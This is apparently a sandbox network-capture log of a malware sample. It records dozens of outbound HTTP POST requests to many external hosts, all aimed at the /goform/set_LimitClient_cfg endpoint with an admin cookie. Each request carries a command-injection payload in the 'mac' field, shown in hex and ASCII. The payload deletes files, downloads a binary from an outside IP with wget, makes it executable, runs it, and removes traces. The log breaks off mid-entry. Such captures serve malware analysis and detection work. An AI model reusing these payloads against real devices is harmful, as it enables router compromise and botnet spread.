                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        353192.168.2.234335265.243.36.168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291040897 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        354192.168.2.2341288168.103.112.98080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291109085 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        355192.168.2.235250082.194.154.2068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291186094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        356192.168.2.2358208146.77.242.2098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291196108 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        357192.168.2.2356136219.77.233.328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291223049 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        358192.168.2.2337936199.193.217.2128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291246891 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        359192.168.2.234017245.165.198.1688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291315079 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        360192.168.2.2336304144.148.174.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291338921 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        361192.168.2.2340874221.229.65.2348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291361094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        362192.168.2.2344036133.177.223.2348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291378021 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        363192.168.2.234907269.61.43.2328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291409969 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        364192.168.2.2342220140.60.48.818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291460037 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        365192.168.2.233532027.212.34.1038080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291481972 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        366192.168.2.2347668209.13.89.538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291501045 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        367192.168.2.233531094.211.224.1688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291536093 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        368192.168.2.2340962117.213.223.508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291536093 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        369192.168.2.2337504182.38.103.1618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291568041 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        370192.168.2.2339892163.189.104.1268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291595936 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        371192.168.2.2334848203.138.11.1578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291618109 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        372192.168.2.2348706176.174.217.558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291650057 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        373192.168.2.235731636.0.30.2118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291676044 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        374192.168.2.2340710124.37.55.968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291696072 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        375192.168.2.235880650.143.5.2508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.291714907 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
